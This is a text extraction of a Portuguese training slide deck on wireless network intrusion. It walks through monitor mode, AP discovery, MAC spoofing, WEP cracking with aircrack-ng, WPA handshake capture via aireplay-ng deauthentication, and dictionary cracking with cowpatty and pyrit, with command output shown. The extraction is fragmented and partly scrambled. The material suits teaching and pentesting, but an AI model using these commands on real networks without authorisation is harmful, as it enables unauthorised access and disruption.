Professional Documents
Culture Documents
de
Invaso
em
Redes
Sem
Fio
Nelson Murilo
Clavis Segurana da Informao
$ whoami
Consultor Infosec
2 livros publicados
Pentester
Investigador Forense
Incident Handler
Instrutor e Palestrante
Contatos
nmurilo@gmail.com
nelson.murilo
@nelsonmurilo
Modelo do Curso
Introduo
Conceitos de redes Wi-Fi
Principais vulnerabilidades
Ferramentas atuais
Sondagem e mapeamento
Identificao do ambiente
Ataques
Finalizando
Introduo
Conceitos
Caractersticas
Redes sem fio
Wi-Fi
Bluetooth
Infravermelho
WiMax
RFID
Celular (GSM/TDMA/CDMA, etc.)
ZigBee (802.15.4)
UWB (802.15.3)
IEEE 802.11
Padres atuais:
802.11b 11Mb 2.4Ghz
802.11a 54Mb 5.1GHz
802.11g 54Mb 2.4Ghz
802.11i - Mecanismos de segurana
802.1x Mecanismos de autenticao, uso em
redes cabeadas e sem fio
802.11n Aumento da velocidade, 108Mb
nominais.
# dmesg | grep phy
[ 0.000000] BIOS-provided physical RAM map:
[ 84.913442] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 84.913969] Registered led device: rt2800usb-phy0::radio
[ 84.913999] Registered led device: rt2800usb-phy0::assoc
[ 84.914026] Registered led device: rt2800usb-phy0::quality
# iwconfig
lo no wireless extensions.
23:05:16.386193
Beacon
()
[1.0
2.0
5.5
11.0
6.0
12.0
24.0
36.0
Mbit]
ESS
CH:
11
23:05:16.488612
Beacon
()
[1.0
2.0
5.5
11.0
6.0
12.0
24.0
36.0
Mbit]
ESS
CH:
11
23:05:17.321039
Beacon
(Homenet54)
[1.0
2.0
5.5
11.0
Mbit]
ESS
CH:
3
23:05:17.629271
Beacon
(Homenet54)
[1.0
2.0
5.5
11.0
Mbit]
ESS
CH:
3
Divulgao do nome da rede
00:07:40:4D:1A:5C
09:15:42.216583 218us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:
00:07:40:4d:1a:5c (oui Unknown) SA:00:21:29:65:b8:45 (oui Unknown)
Probe Request (LABVIRUS) [1.0 2.0 5.5 11.0 6.0 9.0 12.0 18.0 Mbit][|
802.11]
RADIUS
WPA - Enterprise
/etc/password
/etc/raddb/users
Oracle/MySQL/etc
Cer_cado
Digital
RADIUS
Biometria
Conceitos iniciais
$
/sbin/ifcong
wlan0
wlan0
Link
encap:Ethernet
HWaddr
00:21:29:65:b8:45
UP
BROADCAST
MULTICAST
MTU:1500
Metric:1
RX
packets:0
errors:0
dropped:0
overruns:0
frame:0
TX
packets:0
errors:0
dropped:0
overruns:0
carrier:0
collisions:0
txqueuelen:1000
RX
bytes:0
(0.0
B)
TX
bytes:0
(0.0
B)
Modo promiscuo
#
iwcong
wlan0
wlan0
IEEE
802.11bg
ESSID:o/any
Mode:Managed
Access
Point:
Not-Associated
Tx-Power=20
dBm
Retry
long
limit:7
RTS
thr:o
Fragment
thr:o
Encryp_on
key:o
Power
Management:on
#
iw
wlan0
info
Interface
wlan0
index
32
type
managed
Modo Monitor
# iw dev wlan0 interface add mon0 type monitor
Modo Monitor
# iwconfig mon0
mon0
IEEE
802.11bg
Mode:Monitor
Tx-Power=20
dBm
Retry
long
limit:7
RTS
thr:o
Fragment
thr:o
Power
Management:on
# iw mon0 info
Interface
mon0
index
35
type
monitor
Modo monitor
14:22:52.234724 1.0 Mb/s 2412 MHz 11b -74dB signal antenna 1 [bit 14] 0us
Beacon (LABVIRUS) [1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 Mbit] ESS CH: 1,
PRIVACY[|802.11]
14:22:52.260469 1.0 Mb/s 2412 MHz 11b -48dB signal antenna 1 [bit 14] WEP
Encrypted 0us Data IV:5b5 Pad 20 KeyID 2
14:22:52.261938 54.0 Mb/s 2412 MHz 11g -18dB signal antenna 1 [bit 14] WEP
Encrypted 44us Data IV:4104 Pad 20 KeyID 0
3 packets captured
Seleo de canais
14:49:58.832316 1.0 Mb/s 2462 MHz 11b -62dB signal antenna 1 [bit 14] 0us
Beacon () [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 11[|802.11]
14:49:58.847041 1.0 Mb/s 2462 MHz 11b -78dB signal antenna 1 [bit 14] 0us
Beacon (GVT-CC81) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
14:49:58.866671 1.0 Mb/s 2462 MHz 11b -80dB signal antenna 1 [bit 14] 0us
Beacon (GVT-0C87) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 11, PRIVACY[
|802.11]
3 packets captured
Identificao de APs
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:25:9C:36:A0:9F 00:0E:2E:EC:6B:05 -1 11 - 0 0 1
00:25:9C:36:A0:9F 00:0E:2E:45:F5:B3 -1 11 - 0 0 1
Identificao de APs
B E N C C IPH E R A UT H ESSID
XQ B e a c on s # D a ta , # /s CH M
BSSID PWR R
7 5 1 1 e . O P N bsbca
0 :9 F -8 8 1 5 18 108 4
00:25:9C:36:A
Anlise do trfego
tshark -r Kismet-20120309-04-23-25-1.pcapdump
6007 334.636502 Apple_67:a1:ef -> Broadcast ARP 114 Gratuitous ARP for 192.168.1.104 (Request)
6448 358.804988 192.168.1.191 -> 239.255.255.250 SSDP 487 NOTIFY * HTTP/1.1
9739 547.951220 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
9740 547.953352 Fortinet_ca:d3:11 -> Motorola_21:29:6a ARP 116 Who has 192.168.1.18? Tell 192.168.1.1
10144 572.216034 192.168.1.103 -> 224.0.0.251 MDNS 645 Standard query response TXT, cache flush PTR
Identificao de APs
Anlise do trfego
iwconfig wlan5 essid bsbca
iwconfig wlan5
wlan5 IEEE 802.11abgn ESSID:"bsbca"
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Filtro de MAC
Linux
# ifconfig ath0 hw ether 00:00:00:00:00:01
Mac
OSX
# ifconfig en0 ether 00:00:00:00:00:01
FreeBSD
# ifconfig xl3 ether 00:00:00:00:00:01
OpenBSD/NetBSD
# wiconfig wi0 -m 00:00:00:00:00:01
Filtro de MAC
Wired Equivalent Privacy
Wired Equivalent Privacy
Protocolo frgil
Ou por dicionrio
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
logtypes=pcapdump,gpsxml,netxml,nehxt,alert
gps=true
preferredchannels=1,6,11
allowplugins=true
$
ls
-lh
Kismet*
-rw-r--r--
1
root
root
8.0M
2012-02-20
14:04
Kismet-20120220-13-47-37-1.pcapdump
hhp://blog.kismetwireless.net/
Suite
formada
de
vrios
programas
Anlise
de
trfego
Injeo de pacotes
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
# airodump-ng mon0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
$ aircrack-ng labvirus-01.pcap
[00:00:05]
Tested
633
keys
(got
46103
IVs)
KB
depth
byte(vote)
0
2/
4
14(55552)
13(54528)
3C(53504)
98(53504)
24(53248)
1
2/
1
DE(54784)
92(54528)
06(52992)
7D(52736)
02(52480)
2
1/
3
82(56576)
18(54272)
45(53760)
CD(53504)
FC(53248)
3
1/
3
09(57600)
08(55808)
41(55040)
C9(54016)
8E(52992)
4
51/
4
A1(48640)
83(48384)
86(48384)
99(48384)
B2(48384)
KEY
FOUND!
[
6E:61:6F:XX:XX:XX:XX:XX:XX:XX:XX
]
(ASCII:
naoxxxxxxxx
)
Decrypted
correctly:
100%
Wired Equivalent Privacy
Wired Equivalent Privacy
Aireplay-ng
# arp an
#
in g - c 1 1 9 2 .1 68.11.1 4) b y te s of data.
#p .1 ) 5 6 (8
1 9 2 .1 68 .1 1 .1 (192.168.11 tt l= 2 5 5 ti m e = 5 4.9 ms
PING .11 .1 : icmp_seq=1
1 9 2 .1 6 8
64 bytes from
1 .1 p in g s ta ti s tics --- time 0ms
--- 192.168.1 % p a c k e t los s ,
tr a n s m it ted , 1 received, 0 7 3 / 0 .0 00 ms
p a c k ets 7 3 / 5 4 .9
1
g / m a x /m d e v = 54.973/54.9
rtt min/av
8 [ether] on wlan0
# arp an 7 :4 0 :3 5 :a 1 :1
at 00:0
(192.168.11.1)
Aireplay-ng
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
# airodump-ng -c 11 mon0
Aireplay-ng
# airodump-ng --bssid 00:21:29:65:B8:45 -w cafe-latte -c 1 mon0
# aircrack-ng cafe-latte-01.cap
KB depth byte(vote)
0 0/ 1 6E(56064) 15(45824) 3D(45312) AA(44800) 4A(44288)
1 0/ 9 61(53760) 44(46336) 98(45568) 0E(44800) C4(44800)
2 33/ 2 AE(41728) 18(41472) 6C(41472) 6F(41472) A1(41472)
3 7/ 3 F0(43776) 70(43264) B4(43264) 62(43008) 50(42752)
4 0/ 2 B8(56576) CD(46848) 94(46080) C9(45056) 3F(44800)
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol
D -Lin k_ 74 :1 5: 28 EA PO L 131 Ke y (msg 1/4)
e ->
39965 377.079356 D-Link_50:2f:2 50 :2 f:2 e EA PO L 16 0 Ke y (m sg 2/4)
28 -> D -Lin k_
39968 377.086048 D-Link_74:15: :1 5: 28 EA PO L 18 7 Ke y (m sg 3/4)
e -> D-Lin k_ 74
39969 377.089080 D-Link_50:2f:2 50 :2 f:2 e EA PO L 13 6 Ke y (m sg 4/ 4)
97 1 37 7. 10 44 80 D-L in k_ 74 :1 5: 28 -> D-Link_
39
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22
Wai_ng
for
beacon
frame
(ESSID:
dlink)
on
channel
6
Found
BSSID
"00:1B:11:50:2F:2E"
to
given
ESSID
"dlink".
08:49:22
Sending
64
directed
DeAuth.
STMAC:
[00:26:5A:74:15:28]
[
0|63
ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
aircrack-ng dlink-01.cap
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Opening dlink-01.cap
Read 60093 packets.
real 9m2.988s
user 9m2.468s
sys 0m0.414s
Cowpatty
time genpmk f popular.dic -d dlink234.pmk -s dlink
[]
real 9m2.988s
user 9m2.468s
_me
pyrit
I
popular.dic
-o
dlink.pmk
-e
dlink
passthrough
sys 0m0.414s
Pyrit
0.4.1-dev
(svn
r308)
(C)
2008-2011
Lukas
Lueg
hhp://pyrit.googlecode.com
This
code
is
distributed
under
the
GNU
General
Public
License
v3+
Computed
109216
PMKs
total;
1865
PMKs
per
secondd
real
1m20.753s
user
5m2.437s
sys
0m0.753s
Cowpatty
cowpahy
d
dlinkpop.pmk
-s
dlink
-r
dlink-01.cap
real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Perguntas?
Cr_cas?
Sugestes?
Siga a Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Muito
Obrigado!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurana da Informao